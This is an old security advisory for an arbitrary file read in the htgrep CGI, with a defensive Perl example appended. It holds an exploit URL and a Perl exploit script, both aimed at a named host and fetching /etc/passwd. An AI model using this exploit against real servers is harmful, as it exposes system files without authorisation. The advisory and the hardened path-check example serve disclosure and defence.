Vulnerability

    htgrep

Affected

    Htgrep CGI

Description

    'n30' found the following. Any remote user can use htgrep to view arbitrary files on the system with the privileges of the web user. The CGI allows a user to specify a header and footer file to be appended to the search output; this file should be located in the wwwroot, which is specified in the script itself. Any attempt to specify a header or footer file by using backwards directory referencing is trapped. However, it is possible to specify a file using an absolute path.

    Exploit:

        http://www.dematel.com/cgibin/htgrep/file=index.html&hdr=/etc/passwd

    The file /etc/passwd will be displayed instead of the default header file.

    Code:

        #!/usr/local/bin/perl
        #
        # Htgrep EXPLOIT Script by n30 17/8/2000
        #
        # For: Unix/Linux all Distro's
        #      maybe Winnt?? anyone??
        #
        # Versions: All upto latest: htgrep v3.0
        #
        # Info: to find the version number being used:
        #
        #       www.server.com/cgi-bin/htgrep/version
        #
        # Some ppl use a wrapper for the script thusly
        # eliminating the file argument, the sploit will
        # still werk just add &hdr=<filename> to the end :-)
        #
        # if &isindex=<text> is present in the URL REMOVE IT!!!
        # or else the exploit won't werk :-)
        #
        # Mail : n30@gmx.co.uk

        use strict;
        use LWP::UserAgent;
        use HTTP::Request;
        use HTTP::Response;

        my $ua = new LWP::UserAgent;

        # *************************************************
        my $TargetHost="www.dematel.com";
        my $TargetPath="/cgibin/htgrep";
        # SearchFile can commonly be index.html or some other file in the wwwroot
        my $SearchFile="index.html";
        # FiletoGet ?? think for ur self:
        my $FiletoGet="/etc/passwd";
        # **************************************************

        my $url="http://".$TargetHost.$TargetPath."/file=$SearchFile&hdr=$FiletoGet";

        print("\nHtgrep Arbitrary File Reading Vulnerability EXPLOIT /n30\n\n");
        print("URL: $url\n\n");

        my $request = new HTTP::Request('GET', $url);
        my $response = $ua->request($request);

        if ($response->is_success) {
            print $response->content;
        } else {
            print $response->error_as_HTML;
        }

Solution

    The author has been notified; it is likely that an update will be available shortly.
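
The flaw described above is a path check that traps ".." but lets an absolute path through. The following Perl example is added here and is not htgrep's own code: `naive_check` models the behaviour the advisory describes, and `safe_check` resolves the requested name and requires the result to stay under the web root. Both function names, `$WWWROOT` and the temporary header file are constructed for illustration, and Unix paths are assumed.

```perl
#!/usr/bin/perl
# Added example: header/footer path validation for a CGI such as htgrep.
# naive_check, safe_check and $WWWROOT are hypothetical names, not htgrep's.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Model of the flawed check from the advisory: only ".." is trapped,
# so an absolute path such as /etc/passwd is accepted unchanged.
sub naive_check {
    my ($root, $name) = @_;
    return undef if $name =~ /\.\./;
    return File::Spec->file_name_is_absolute($name) ? $name : "$root/$name";
}

# Hardened check: refuse absolute names, anchor the name under the web
# root, resolve symlinks and dot segments, then require containment.
sub safe_check {
    my ($root, $name) = @_;
    return undef if !defined $name || $name eq '' || $name =~ /\0/;
    return undef if File::Spec->file_name_is_absolute($name);
    my $real_root = realpath($root);
    return undef unless defined $real_root;
    my $real = realpath(File::Spec->catfile($real_root, $name));
    return undef unless defined $real && -f $real;
    return undef unless index($real, "$real_root/") == 0;
    return $real;
}

# Constructed test data: a temporary web root holding one header file.
my $WWWROOT = tempdir(CLEANUP => 1);
open(my $fh, '>', "$WWWROOT/header.html") or die "cannot create header: $!";
print $fh "<h1>Search results</h1>\n";
close $fh;

# Values a client could send as hdr=; only the first is legitimate.
for my $hdr ('header.html', '/etc/passwd', '../../etc/passwd') {
    my $naive = naive_check($WWWROOT, $hdr);
    my $safe  = safe_check($WWWROOT, $hdr);
    printf "hdr=%-18s naive: %-8s safe: %s\n", $hdr,
        defined $naive ? 'ACCEPTED' : 'REJECTED',
        defined $safe  ? 'ACCEPTED' : 'REJECTED';
}
```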